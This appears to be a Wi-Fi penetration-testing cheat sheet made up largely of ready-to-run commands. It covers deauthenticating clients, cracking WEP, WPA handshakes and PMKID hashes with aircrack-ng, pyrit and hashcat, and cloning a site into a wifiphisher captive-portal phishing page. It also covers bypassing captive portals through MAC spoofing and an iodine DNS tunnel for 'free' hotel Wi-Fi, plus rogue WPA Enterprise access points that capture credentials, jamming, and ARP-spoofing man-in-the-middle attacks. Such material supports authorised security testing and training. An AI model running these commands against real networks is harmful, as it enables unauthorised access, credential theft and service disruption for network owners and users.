2.1. Captive portals
3.1. No clients
4.1. Cracking the 4-way-handshake
4.2. PMKID attack
5.1. Fake Access Points
5.2. Brute force
6.1. Krack Attack and Frag Attack
6.2. OSINT
6.3. Wifi Jamming
6.4. Other frameworks
7.1. Attacking the router
7.2. Types of scanners
7.3. Spoofing
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Set monitor mode
Run Airodump-ng-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
- Only one client
- An Access Point (= all the clients in the AP)
Get hidden SSID with clients
- List networks
List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
- Deauthenticate
In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:
Get hidden SSID without clients
- List networks
List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
2.a. Execute a dictionary attack
2.b. Or execute a bruteforce attack
For the character set it is possible to use l (lowercase letters), u (uppercase letters), n (numbers), c (lowercase+uppercase), m (lowercase+uppercase+numbers) or a (all printed).
Clone a website using HTTrack
Install Wifiphiser. Add the HTTrack result in a new folder in wifiphisher/data/phishing-pages/new_page/html and a configuration file in wifiphisher/data/phishing-pages/new_page/config.ini.
Recompile the project using python setup.py install or the binary in bin.
This command works correctly in the latest Kali release after installing hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
The first method to bypass a captive portal is to change your MAC address to one of an already authenticated user
- Scan the network and get the list of IP and MAC addresses. You can use:
- Change your IP and MAC addresses. You can use:
A custom script like this(Bash)
Also, you can use scripts to automate the process like:
A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get "free" Wifi in hotel, airports...
- Check the domain names are resolved:
nslookup example.com
- Create 2 DNS records (in Digital ocean, Afraid.org...):
One "A record": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com
One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)
- Execution in the server
iodined -f -c -P $PASS -n $SERVER_IP hack.$DOMAIN
Check if it works correctly in here
Execution in the client
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
- Create the tunnel
ssh -D 8080 [email protected]
Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.
ARP Spoofing attack using Ettercap
Sniff the traffic using Wireshark or TCPdump
Analyze the traffic using PCredz (Linux) or Network Miner (Windows)
- Start capture
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
- Accelerate the IV capture using Fake authentication + Arp Request Replay Attack + Deauthenticate user. Stop Airodump at ~100.000 different IVs
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
- Crack the password using Aircrack-ng
aircrack-ng $PCAP_FILE
- Start capture
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
- Deauthenticate an user. Stop airodump capture when you see a message 'WPA handshake: $MAC'
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
- Option 1: Crack the handshake using Aircrack-ng
aircrack-ng -w $WORDLIST capture.cap
You can get wordlists from here.
- Option 2: Crack the handshake using Pyrit
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
You can use this script or follow these steps:
Install Hcxdumptool and Hcxtool (you can use this script).
Stop Network Manager
airmon-ng check kill
3a. If you want to attack a specific MAC address
- Create a text file ($FILTER_FILE) and add the MAC address without ":". You can use sed and redirect the output to a file:
echo $MAC | sed 's/://g' > $FILTER_FILE
- Capture PMKID
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
- Create $HASH_FILE
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
The structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
- Crack it using Hashcat (option 16800)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
Operating system | Platform | Credentials | Size | Link |
Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |
In case you do not want to use the virtual machine, you can install everything using:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
Start the Access Point using:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
When a client connects, read logs with:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
Find supported EAP methods
These are two advanced attacks discovered by the great Mathy Vanhoef:
Krack Attack Scripts - Explained in this website
Frag Attack Scripts - Explained in this website
- Wifijammer - This program can send deauthentication packets to both APs and clients.
An example to deauthenticate all the devices except a Fake Acess Point:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
- Sniffair
- Wifi Pumpkin - Framework for Rogue WiFi Access Point Attack
- Eaphammer - Framework for Fake Access Points
- WEF - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more
- Acrylic - Useful for recon phase
- Ekahau - Useful for Wi-Fi planning
- Vistumbler - Useful for wardriving
Once you are connected to the network
- Routersploit - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"
Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
Masscan - The faster version of nmap (it can break things, so be careful)
Netdiscover - ARP sniffing. Very useful if the networks are very well segmented
- Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network